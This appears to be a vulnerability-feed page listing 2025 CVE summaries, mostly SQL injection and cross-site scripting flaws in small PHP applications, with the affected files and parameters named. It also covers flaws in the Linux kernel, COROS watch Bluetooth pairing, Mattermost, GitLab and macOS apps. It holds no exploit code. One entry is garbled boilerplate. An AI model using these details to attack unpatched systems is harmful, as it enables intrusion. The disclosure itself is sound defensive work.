In the Linux kernel, the following vulnerability has been resolved: net_sched: prio: fix a race in prio_tune() Gerrard Tai reported a race condition in PRIO, whenever SFQ perturb timer fires at the wrong time. The race is as follows: CPU 0 CPU 1 [1]: lock root [2]: qdisc_tree_flush_backlog() [3]: unlock root | | [5]: lock root | [6]: rehash | [7]: qdisc_tree_reduce_backlog() | [4]: qdisc_put() This can be abused to underflow a parent's qlen. Calling qdisc_purge_queue() instead of qdisc_tree_flush_backlog() should fix the race, because all packets will be purged from the qdisc before releasing the lock.

Race Condition Information Disclosure Linux Ubuntu Debian
CVE-2025-32876 MEDIUM CVSS 6.8
An issue was discovered on COROS PACE 3 devices through 3.0808.0. The BLE implementation of the COROS smartwatch does not support LE Secure Connections and instead enforces BLE Legacy Pairing. In BLE Legacy Pairing, the Short-Term Key (STK) can be easily guessed. This requires knowledge of the Temporary Key (TK), which, in the case of the COROS Pace 3, is set to 0 due to the Just Works pairing method. An attacker within Bluetooth range can therefore perform sniffing attacks, allowing eavesdropping on the communication.

Authentication Bypass Coros Pace 3 Firmware
CVE-2025-32875 MEDIUM CVSS 5.7
An issue was discovered in the COROS application through 3.8.12 for Android. Bluetooth pairing and bonding is neither initiated nor enforced by the application itself. Also, the watch does not enforce pairing and bonding. As a result, any data transmitted via BLE remains unencrypted, allowing attackers within Bluetooth range to eavesdrop on the communication. Furthermore, even if a user manually initiates pairing and bonding in the Android settings, the application continues to transmit data without requiring the watch to be bonded. This fallback behavior enables attackers to exploit the communication, for example, by conducting an active machine-in-the-middle attack.

Authentication Bypass Google Android
CVE-2025-32753 MEDIUM CVSS 5.3
Dell PowerScale OneFS, versions 9.5.0.0 through 9.10.0.1, contains an improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to denial of service, information disclosure, and information tampering.

SQLi Information Disclosure Denial Of Service Dell Powerscale Onefs
CVE-2025-6365 MEDIUM CVSS 5.7
A vulnerability was found in HobbesOSR Kitten up to c4f8b7c3158983d1020af432be1b417b28686736 and classified as critical. Affected by this issue is the function set_pte_at in the library /include/arch-arm64/pgtable.h. The manipulation leads to resource consumption. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available.

Denial Of Service Kitten
CVE-2025-6352 MEDIUM CVSS 5.3
A security vulnerability in A vulnerability classified as problematic (CVSS 5.3). Risk factors: public PoC available.

PHP Information Disclosure Automated Voting System
CVE-2025-6351 MEDIUM CVSS 6.3
A vulnerability was found in itsourcecode Employee Record Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /editprofile.php. The manipulation of the argument emp1name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Employee Management System
CVE-2025-6346 MEDIUM CVSS 6.3
A vulnerability was found in SourceCodester Advance Charity Management System 1.0. It has been classified as critical. This affects an unknown part of the file /members/fundDetails.php. The manipulation of the argument m06 leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Advance Charity Management System
CVE-2025-6341 MEDIUM CVSS 4.3
A vulnerability classified as problematic was found in code-projects School Fees Payment System 1.0. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

CSRF School Fees Payment System
CVE-2025-6335 MEDIUM CVSS 4.7
A vulnerability was found in DedeCMS up to 5.7.2 and classified as critical. This issue affects some unknown processing of the file /include/dedetag.class.php of the component Template Handler. The manipulation of the argument notes leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

PHP Command Injection Dedecms
CVE-2025-6333 MEDIUM CVSS 6.3
A vulnerability, which was classified as critical, was found in PHPGurukul Directory Management System 2.0. This affects an unknown part of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Directory Management System
CVE-2025-6332 MEDIUM CVSS 6.3
A vulnerability, which was classified as critical, has been found in PHPGurukul Directory Management System 2.0. Affected by this issue is some unknown functionality of the file /admin/manage-directory.php. The manipulation of the argument del leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Directory Management System
CVE-2025-6331 MEDIUM CVSS 6.3
A vulnerability classified as critical was found in PHPGurukul Directory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/search-directory.php. The manipulation of the argument searchdata leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Directory Management System
CVE-2025-6329 MEDIUM CVSS 5.4
A vulnerability was found in ScriptAndTools Real Estate Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file userdelete.php of the component User Delete Handler. The manipulation of the argument ID leads to authorization bypass. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

PHP Authentication Bypass Real Estate Management System
CVE-2025-6321 MEDIUM CVSS 6.3
A vulnerability has been found in PHPGurukul Pre-School Enrollment System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/add-subadmin.php. The manipulation of the argument sadminusername leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Pre School Enrollment System
CVE-2025-6320 MEDIUM CVSS 6.3
A vulnerability, which was classified as critical, was found in PHPGurukul Pre-School Enrollment System 1.0. Affected is an unknown function of the file /admin/add-class.php. The manipulation of the argument classname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Pre School Enrollment System
CVE-2025-6319 MEDIUM CVSS 6.3
A vulnerability, which was classified as critical, has been found in PHPGurukul Pre-School Enrollment System 1.0. This issue affects some unknown processing of the file /admin/add-teacher.php. The manipulation of the argument tsubject leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Pre School Enrollment System
CVE-2025-6309 MEDIUM CVSS 6.3
A vulnerability classified as critical was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/add-ambulance.php. The manipulation of the argument ambregnum leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Emergency Ambulance Hiring Portal
CVE-2025-6308 MEDIUM CVSS 6.3
A vulnerability classified as critical has been found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected is an unknown function of the file /admin/bwdates-request-report-details.php. The manipulation of the argument fromdate/todate leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Emergency Ambulance Hiring Portal
CVE-2025-6299 MEDIUM CVSS 4.7
A vulnerability classified as critical has been found in TOTOLINK N150RT 3.4.0-B20190525. This affects an unknown part of the file /boa/formWSC. The manipulation of the argument targetAPSsid leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

Command Injection N150rt Firmware TOTOLINK
CVE-2025-6264 MEDIUM CVSS 5.5
Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated permissions. To limit access to some dangerous artifact, Velociraptor allows for those to require high permissions like EXECVE to launch. The Admin.Client.UpdateClientConfig is an artifact used to update the client's configuration. This artifact did not enforce an additional required permission, allowing users with COLLECT_CLIENT permissions (normally given by the "Investigator" role) to collect it from endpoints and update the configuration. This can lead to arbitrary command execution and endpoint takeover. To successfully exploit this vulnerability the user must already have access to collect artifacts from the endpoint (i.e. have the COLLECT_CLIENT given typically by the "Investigator' role).

Privilege Escalation Velociraptor Suse
CVE-2025-6257 MEDIUM CVSS 6.4
The Euro FxRef Currency Converter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's currency shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

WordPress XSS PHP
CVE-2025-6193 MEDIUM CVSS 5.9
A command injection vulnerability was discovered in the TrustyAI Explainability toolkit.

Command Injection Redhat
CVE-2025-5963 MEDIUM CVSS 4.8
The Postbox's configuration on macOS, specifically the presence of entitlements: "com.apple.security.cs.allow-dyld-environment-variables" and "com.apple.security.cs.disable-library-validation" allows for Dynamic Library (Dylib) injection. A local attacker with unprivileged access can use environment variables like DYLD_INSERT_LIBRARIES to successfully inject code in application's context and bypass Transparency, Consent, and Control (TCC). Acquired resource access is limited to previously granted permissions by the user. Access to other resources beyond granted-permissions requires user interaction with a system prompt asking for permission. The original company behind Postbox is no longer operational, the software will no longer receive updates. The acquiring company (em Client) did not cooperate in vulnerability disclosure.

Apple Privilege Escalation macOS
CVE-2025-5255 MEDIUM CVSS 4.8
The Phoenix Code's configuration on macOS, specifically the presence of entitlements: "com.apple.security.cs.allow-dyld-environment-variables" and "com.apple.security.cs.disable-library-validation" allows for Dynamic Library (Dylib) injection. A local attacker with unprivileged access can use environment variables like DYLD_INSERT_LIBRARIES to successfully inject code in application's context and bypass Transparency, Consent, and Control (TCC). Acquired resource access is limited to previously granted permissions by the user. Access to other resources beyond granted-permissions requires user interaction with a system prompt asking for permission. This issue was fixed in commit 0c75fb57f89d0b7d9b180026bc2624b7dcf807da

Apple Privilege Escalation macOS
CVE-2025-5125 MEDIUM CVSS 4.8
The Custom Post Carousels with Owl WordPress plugin before 1.4.12 uses the featherlight library and makes use of the data-featherlight attribute without sanitizing before using it.

WordPress XSS Custom Post Carousels With Owl PHP
CVE-2025-3228 MEDIUM CVSS 4.3
Mattermost versions 10.5.x <= 10.5.5, 9.11.x <= 9.11.15, 10.8.x <= 10.8.0, 10.7.x <= 10.7.2, 10.6.x <= 10.6.5 fail to properly retrieve requestorInfo from playbooks handler for guest users which allows an attacker access to the playbook run.

Authentication Bypass Debian Mattermost Server Suse
CVE-2025-3227 MEDIUM CVSS 4.3
Mattermost versions 10.5.x <= 10.5.5, 9.11.x <= 9.11.15, 10.8.x <= 10.8.0, 10.7.x <= 10.7.2, 10.6.x <= 10.6.5 fail to properly enforce channel member management permissions in playbook runs, allowing authenticated users without the 'Manage Channel Members' permission to add or remove users from public and private channels by manipulating playbook run participants when the run is linked to a channel.

Authentication Bypass Debian Mattermost Server Suse
CVE-2024-7586 MEDIUM CVSS 4.1
An issue was discovered in GitLab EE affecting all versions starting from 17.0 prior to 17.0.6, starting from 17.1 prior to 17.1.4, and starting from 17.2 prior to 17.2.2, where webhook deletion audit log preserved auth credentials.

Gitlab Information Disclosure Ubuntu Debian
CVE-2024-4025 MEDIUM CVSS 6.5
A Denial of Service (DoS) condition has been discovered in GitLab CE/EE affecting all versions from 7.10 prior before 16.11.5, version 17.0 before 17.0.3, and 17.1 before 17.1.1. It is possible for an attacker to cause a denial of service using a crafted markdown page.

Gitlab Denial Of Service Ubuntu Debian
CVE-2025-52484 LOW CVSS 2.7
A security vulnerability in RISC Zero (CVSS 2.7). Remediation should follow standard vulnerability management procedures.

Information Disclosure
CVE-2025-48059 LOW CVSS 2.7
PowSyBl (Power System Blocks) is a framework to build power system oriented software. In com.powsybl:powsybl-iidm-criteria versions 6.3.0 to before 6.7.2 and com.powsybl:powsybl-contingency-api versions 5.0.0 to before 6.3.0, there is a a potential polynomial Regular Expression Denial of Service (ReDoS) vulnerability in the RegexCriterion class. This class compiles and evaluates an unvalidated, user-supplied regular expression against the identifier of an Identifiable object via Pattern.compile(regex).matcher(id).find(). If successfully exploited, a malicious actor can cause significant CPU exhaustion through repeated or recursive filter(...) calls - especially if performed over large network models or filtering operations. This issue has been patched in com.powsybl:powsybl-iidm-criteria 6.7.2.

Denial Of Service
CVE-2025-6353 LOW CVSS 3.5
A vulnerability classified as problematic was found in code-projects Responsive Blog 1.0. Affected by this vulnerability is an unknown functionality of the file /search.php. The manipulation of the argument keyword leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

PHP XSS
CVE-2025-6347 LOW CVSS 2.4
A vulnerability was found in code-projects Responsive Blog 1.0/1.12.4/3.3.4. It has been declared as problematic. This vulnerability affects unknown code of the file /responsive/resblog/blogadmin/admin/pageViewMembers.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

PHP XSS
CVE-2025-6345 LOW CVSS 3.5
A vulnerability was found in SourceCodester My Food Recipe 1.0 and classified as problematic. Affected by this issue is the function addRecipeModal of the file /endpoint/add-recipe.php of the component Add Recipe Page. The manipulation of the argument Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

PHP XSS
CVE-2025-6340 LOW CVSS 3.5
A vulnerability classified as problematic has been found in code-projects School Fees Payment System 1.0. This affects an unknown part of the file /branch.php. The manipulation of the argument Branch/Address/Detail leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

PHP XSS
CVE-2025-6301 LOW CVSS 2.4
A vulnerability, which was classified as problematic, has been found in PHPGurukul Notice Board System 1.0. This issue affects some unknown processing of the file /admin/manage-notices.php of the component Add Notice. The manipulation of the argument Title/Description leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

PHP XSS
CVE-2025-6288 LOW CVSS 2.4
A vulnerability, which was classified as problematic, has been found in PHPGurukul Bus Pass Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/admin-profile.php of the component Profile Page. The manipulation of the argument profile name leads to cross site scripting. The attack may be launched remotely.

PHP XSS
CVE-2025-6287 LOW CVSS 3.5
A vulnerability classified as problematic was found in PHPGurukul COVID19 Testing Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /test-details.php of the component Take Action. The manipulation of the argument remark leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

PHP XSS
CVE-2025-5416 LOW CVSS 2.7
A vulnerability has been identified in Keycloak that could lead to unauthorized information disclosure. While it requires an already authenticated user, the /admin/serverinfo endpoint can inadvertently provide sensitive environment information.

Information Disclosure Debian
CVE-2023-5600 LOW CVSS 3.1
An issue has been discovered in GitLab EE affecting all versions starting from 16.0 before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1. Arbitrary access to the titles of an private specific references could be leaked through the service-desk custom email template.

Gitlab Authentication Bypass Debian

Today's Vulnerabilities Vulnerabilities